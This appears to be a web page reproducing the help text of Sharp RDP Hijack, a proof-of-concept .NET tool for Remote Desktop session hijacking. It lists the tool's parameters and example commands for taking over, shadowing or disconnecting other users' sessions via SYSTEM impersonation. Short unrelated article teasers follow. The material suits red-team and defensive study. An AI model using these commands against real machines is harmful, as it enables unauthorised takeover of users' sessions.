Sharp RDP Hijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility.
RDP session hijacking is a post-exploitation technique for taking control of (forcefully) disconnected interactive login sessions. The technique is described in Mitre ATT&CK T1563.002 – Remote Service Session Hijacking: RDP Hijacking.
[*] Parameters:
[*] A proof-of-concept Remote Desktop (RDP) session hijack utility
- For session hijacking, this utility must be run in an elevated context to connect to another session
- If a password is not specified, NT AUTHORITY\SYSTEM is impersonated
- For session query, admin privileges or "Remote Desktop Users" group membership is required on the target machine
[*] Parameters:
--tsquery=<host> : Query a host to identify RDP/TS session information (not required for other switches)
--session=<ID> : Target session identifier
--password=<User's Password> : Session password if known (otherwise optional - not required for disconnect switch)
--console : Redirect session to console session instead of current (active) session
--shadow : Shadow an active session (experimental)
--disconnect : Disconnect an active (remote) session
[*] Example Usage 1: Impersonate NT AUTHORITY\SYSTEM to hijack session #6 and redirect to the current session
SharpRDPHijack.exe --session=6
[*] Example Usage 2: Impersonate NT AUTHORITY\SYSTEM to hijack session #2 and redirect to the console session
SharpRDPHijack.exe --session=2 --console
[*] Example Usage 3: Hijack Remote Desktop session #4 with knowledge of the logged-on user's password
SharpRDPHijack.exe --session=4 --password=P@ssw0rd
[*] Example Usage 4: Disconnect active session #3
SharpRDPHijack.exe --session=3 --disconnect
[*] Example Usage 5: Query the local host for RDP/TS session information
SharpRDPHijack.exe --tsquery=localhost
[*] Example Usage 6: Shadow active session #3
SharpRDPHijack.exe --session=3 --shadow
[*] Example Usage 7: Shadow inactive session #2 by redirecting the session to the console
SharpRDPHijack.exe --session=2 --shadow --console For more information click here.
Setting a static IP address on your server is a smart move. It ensures your…
Xrdp is an open-source implementation of the Microsoft Remote Desktop Protocol (RDP). It lets you access…
Managing user accounts is one of the most basic system administration tasks on any Linux…
Wine (short for "Wine Is Not an Emulator") is a compatibility layer that lets you run…
KVM (Kernel-based Virtual Machine) is an open-source virtualization technology built into the Linux kernel. It lets…
Ubuntu 20.04 LTS (code name Focal Fossa) was released on April 23, 2020. It is a…